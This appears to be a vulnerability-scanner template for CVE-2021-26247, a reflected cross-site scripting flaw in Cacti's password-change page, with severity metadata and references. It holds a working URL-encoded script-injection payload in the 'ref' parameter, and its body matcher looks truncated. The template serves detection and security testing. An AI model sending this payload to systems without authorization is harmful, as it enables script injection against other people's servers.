id: CVE-2021-26247 info: name: Cacti - Cross-Site Scripting author: dhiyaneshDK severity: medium description: Cacti contains a cross-site scripting vulnerability via "http:///auth_changepassword.php?ref=" which can successfully execute the JavaScript payload present in the "ref" URL parameter. reference: - https://www.cacti.net/info/changelog - https://nvd.nist.gov/vuln/detail/CVE-2021-26247 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-26247 cwe-id: CWE-79 epss-score: 0.00252 cpe: cpe:2.3:a:cacti:cacti:0.8.7g:*:*:*:*:*:*:* epss-percentile: 0.62358 metadata: max-request: 1 vendor: cacti product: cacti tags: cve,cve2021,cacti,xss http: - method: GET path: - '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - '">' - type: word part: header words: - "text/html" - type: status status: - 200